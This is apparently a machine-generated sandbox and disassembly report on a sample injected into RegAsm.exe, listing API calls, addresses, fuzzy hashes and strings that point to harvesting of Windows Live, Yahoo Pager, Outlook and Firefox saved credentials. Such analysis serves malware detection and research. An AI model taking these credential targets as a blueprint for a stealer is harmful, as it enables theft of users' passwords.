                                                                                                                                                                                  • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                                  • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                  • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                • API String ID: 2726666094-3614832568
                                                                                                                                                                                • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00403A88
                                                                                                                                                                                • memset.MSVCRT ref: 00403AA1
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                                                                                • strlen.MSVCRT ref: 00403AE9
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1786725549-0
                                                                                                                                                                                • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                                                                • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                                                                                • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                                                                • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcmp.MSVCRT ref: 00406151
                                                                                                                                                                                  • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                                                                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                                                • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                                • memcmp.MSVCRT ref: 004061A4
                                                                                                                                                                                • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                                                • String ID: global-salt$password-check
                                                                                                                                                                                • API String ID: 231171946-3927197501
                                                                                                                                                                                • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                                                • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                                                APIs
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                • Opcode ID: c740e99957d3823e1ca2a26bbc78dd8b4854877f08f504732b6d9e79513b28b3
                                                                                                                                                                                • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                                                • Opcode Fuzzy Hash: c740e99957d3823e1ca2a26bbc78dd8b4854877f08f504732b6d9e79513b28b3
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                                                • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                                                • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 19018683-0
                                                                                                                                                                                • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                                                • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040644F
                                                                                                                                                                                • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                                                • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                                                  • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0044495F
                                                                                                                                                                                • memset.MSVCRT ref: 00444978
                                                                                                                                                                                • memset.MSVCRT ref: 0044498C
                                                                                                                                                                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                • strlen.MSVCRT ref: 004449A8
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset$strlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2142929671-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                                                • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                • String ID: Passport.Net\*
                                                                                                                                                                                • API String ID: 2053021465-3671122194
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                • memset.MSVCRT ref: 0040330B
                                                                                                                                                                                • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                                                • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                                  • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                                                • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                                  • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                • String ID: Personalities
                                                                                                                                                                                • API String ID: 2103853322-4287407858
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00444573
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                • API String ID: 1830152886-1703613266
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                                                                                • API String ID: 1670431679-1552265934
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0043DFC5
                                                                                                                                                                                • memset.MSVCRT ref: 0043DFFE
                                                                                                                                                                                • memcpy.MSVCRT(00000001,B2850F59,00000000,?,00000001,00000000), ref: 0043E27C
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                                                • String ID: $no query solution
                                                                                                                                                                                • API String ID: 368790112-326442043
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                • API String ID: 3510742995-272990098
                                                                                                                                                                                • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                                                                                                • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                • String ID: H
                                                                                                                                                                                • API String ID: 2221118986-2852464175
                                                                                                                                                                                • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                                                                • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                • API String ID: 3510742995-3170954634
                                                                                                                                                                                • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                                                                • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                                                                                                • memcmp.MSVCRT ref: 0041DBAE
                                                                                                                                                                                • memcmp.MSVCRT ref: 0041DBDB
                                                                                                                                                                                • memcmp.MSVCRT ref: 0041DC47
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                                                                                • API String ID: 231171946-3708268960
                                                                                                                                                                                • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                                                                                                • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                • String ID: winWrite1$winWrite2
                                                                                                                                                                                • API String ID: 438689982-3457389245
                                                                                                                                                                                • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                                                • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                • String ID: winRead
                                                                                                                                                                                • API String ID: 1297977491-2759563040
                                                                                                                                                                                • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                                                • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0044955B
                                                                                                                                                                                • memset.MSVCRT ref: 0044956B
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                • String ID: gj
                                                                                                                                                                                • API String ID: 1297977491-4203073231
                                                                                                                                                                                • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                                                • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                • memset.MSVCRT ref: 0040AB9C
                                                                                                                                                                                  • Part of subcall function 00411004: memcpy.MSVCRT(?,<,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                • API String ID: 3337535707-2769808009
                                                                                                                                                                                • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                                                                                • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                                                • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1189762176-0
                                                                                                                                                                                • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                                                • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4247780290-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                                                                                  • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                                                                                  • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                                                                                • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                                                                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                  • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
